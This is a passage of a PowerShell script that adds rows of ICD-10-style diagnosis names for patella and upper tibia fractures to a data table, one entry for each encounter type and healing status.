fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of right patella","Displaced comminuted fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of left patella","Displaced comminuted fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of unspecified patella","Displaced comminuted fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of right patella","Nondisplaced comminuted fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of left patella","Nondisplaced comminuted fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of unspecified patella","Nondisplaced comminuted fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right patella","Other fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left patella","Other fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified patella","Other fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right tibia","Unspecified fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left tibia","Unspecified fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified tibia","Unspecified fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture 